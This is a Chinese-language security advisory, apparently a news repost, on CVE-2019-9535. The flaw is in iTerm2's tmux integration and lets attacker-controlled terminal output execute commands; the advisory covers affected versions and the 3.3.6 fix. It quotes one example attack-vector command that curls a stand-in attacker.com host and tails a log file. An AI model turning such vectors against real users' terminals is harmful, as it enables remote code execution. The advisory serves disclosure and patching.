简介
iTerm2是全球最热门的终端模拟器之一,是开发人员经常使用的MacOS 终端工具,是Mac内置终端app最有力的热门开源工具替代品之一,被很多开发人员称为“Mac 终端利器”。
漏洞概述
该漏洞的CVE编号是CVE-2019-9535。
在审计过程中,ROS在iTerm2的tmux集成功能中找到了一个至少已存在7年之久的严重漏洞。攻击者如能生成终端输出,则在很多情况下能够在用户计算机上执行命令。这种攻击向量的例子是连接到由攻击者控制的 SSH 服务器或者命令如
curl http://attacker.com and tail -f /var/log/apache2/referer_log
开发人员George Nachman指出,“审计发现某个问题在收到一定的输入后会导致iTerm2发出命令。这个问题非常严重,因为在某些情况下,当用户查看文件或者接收在iTerm2构造的输入时,攻击者就能够在用户机器上执行代码。”
Nachman认为该漏洞影响的iTerm2用户数量介于10万至20万之间。
Mozilla公司的安全工程师Tom Ritter指出,这个漏洞源自iTerm2中的 tmux集成功能。Tumx应用程序是一款终端多路复用器,可允许从单个设备创建并控制多个终端。
CERT协调中心发布漏洞通知表示,可通过使用命令行工具在终端屏幕上打印由攻击者控制的内容,从而利用该漏洞。该中心指出,“潜在的攻击向量包括通过ssh连接至恶意服务器,通过curl 获取恶意网站,或者通过tail –f跟踪包含某些恶意内容的日志文件。”
影响版本
该漏洞影响于本周早些时候发布的 3.3.5 版本及之前版本。
修复方案
目前补丁已发布但自动更新尚未推送,建议用户立即在iTerm2目录中选择“检查新版本”手动更新至最新版本3.3.6。
参考
https://www.freebuf.com/news/216278.html